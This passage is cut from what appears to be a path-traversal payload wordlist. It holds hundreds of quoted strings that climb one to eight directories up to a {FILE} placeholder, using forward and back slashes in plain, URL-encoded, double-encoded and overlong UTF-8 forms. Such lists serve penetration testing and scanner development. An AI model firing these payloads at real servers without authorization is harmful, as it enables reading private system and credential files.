%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","..%%35%63{FILE}","..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","\\../{FILE}","\\../\\../{FILE}","\\../\\../\\../{FILE}","\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\